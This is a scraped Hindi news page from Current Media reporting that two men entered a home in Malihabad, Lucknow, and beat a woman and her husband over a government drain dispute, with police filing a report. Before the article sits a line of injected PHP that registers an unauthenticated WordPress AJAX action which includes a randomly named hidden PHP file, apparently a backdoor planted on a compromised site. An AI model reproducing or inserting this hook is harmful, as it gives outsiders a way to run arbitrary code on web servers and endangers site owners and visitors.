if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }घर मे घुस दबंगो ने महिला व उसके पति को पीटा - Current Media

घर मे घुस दबंगो ने महिला व उसके पति को पीटा

करंट मीडिया न्यूज़/शहजाद अहमद खान
मलिहाबाद/लखनऊ। सरकारी नाली के विवाद को लेकर दबंगो ने एक अधेड़ महिला व उसके पति की जमकर पिटाई कर दी। जिससे महिला बुरी तरह से घायल हो गयी। रहीमाबाद पुलिस ने महिला की तहरीर पर दबंगो के विरुद्ध रिपोर्ट दर्ज कर ली है।
ग्राम मवईकलां निवासिनी रामप्यारी ने मंगलवार को दर्ज कराई गई रिपोर्ट में आरोप लगाया है कि उसके खेत के पास से 60-70 वर्ष पुरानी सरकारी नाली निकली थी। जिसे गांव के ही रूपनारायन व राजेश ने गिरा दिया था। जब वह मंगलवार को खेत मे पानी लगाने जा रही थी तो नाली खोदने लगी। जिसकी रंजिश को लेकर उक्त दोनों ने अधेड़ के घर मे घुस उसके पति रामसहाय को मारने पीटने लगे। अपने पति को पिटता देख महिला ने बीच बचाव करने की कोशिश की जिसपर दोनो दबंगो ने महिला की पिटाई करते हुये पेट पर लात मार दी। जिससे वह बेहोश हो गयी। सूचना पर पहुची रहीमाबाद पुलिस ने घायल महिला को सीएचसी में भर्ती कराने के साथ महिला की तहरीर पर गंभीर धाराओ में रिपोर्ट दर्ज कर ली है।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …